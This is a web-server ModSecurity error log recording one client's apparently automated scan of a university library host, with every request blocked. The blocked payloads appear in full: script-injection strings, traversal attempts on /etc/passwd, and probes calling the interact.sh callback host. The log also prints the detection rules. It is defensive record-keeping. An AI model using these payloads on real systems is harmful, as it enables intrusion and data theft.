[Tue Aug 29 11:52:45.032567 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAoLfKIAAAAG"]
[Tue Aug 29 11:52:45.576522 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53UAAAAK"]
[Tue Aug 29 11:52:45.591037 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15ncCo-f0AAAnjjUEAAAAX"]
[Tue Aug 29 11:52:46.838453 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoVqosAAAAH"]
[Tue Aug 29 11:52:47.639832 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoO54EAAAAK"]
[Tue Aug 29 11:52:47.711560 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAnjjU4AAAAX"]
[Tue Aug 29 11:52:48.801326 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoPuZYAAAAM"]
[Tue Aug 29 11:52:49.547749 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoXJrMAAAAP"]
[Tue Aug 29 11:52:49.578360 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoPuZgAAAAM"]
[Tue Aug 29 11:52:49.590331 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAnHQo4AAAAT"]
[Tue Aug 29 11:52:50.805714 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAoQ3N4AAAAN"]
[Tue Aug 29 11:52:51.875049 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAoT7RcAAAAD"]
[Tue Aug 29 11:52:51.915660 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnTlWQAAAAA"]
[Tue Aug 29 11:52:52.601810 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnHQpsAAAAT"]
[Tue Aug 29 11:52:52.651222 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoVqqcAAAAH"]
[Tue Aug 29 11:52:52.700322 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoXJrsAAAAP"]
[Tue Aug 29 11:52:55.768844 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoW7K8AAAAJ"]
[Tue Aug 29 11:52:55.950709 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoT7SYAAAAD"]
[Tue Aug 29 11:52:56.031099 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoQ3OkAAAAN"]
[Tue Aug 29 11:52:57.917026 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAlUlyoAAAA0"]
[Tue Aug 29 11:52:59.223620 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAfWOTMAAAAL"]
[Tue Aug 29 11:53:00.665512 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAhoHVcAAAAl"]
[Tue Aug 29 11:53:00.710960 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAofm30AAAAX"]
[Tue Aug 29 11:53:01.571629 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoVqsMAAAAH"]
[Tue Aug 29 11:53:01.895786 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAohZ5gAAAAZ"]
[Tue Aug 29 11:53:02.610123 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoXJtYAAAAP"]
[Tue Aug 29 11:53:02.619776 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAouCxsAAAAo"]
[Tue Aug 29 11:53:04.280212 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAfWOUIAAAAL"]
[Tue Aug 29 11:53:04.869286 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoXJt8AAAAP"]
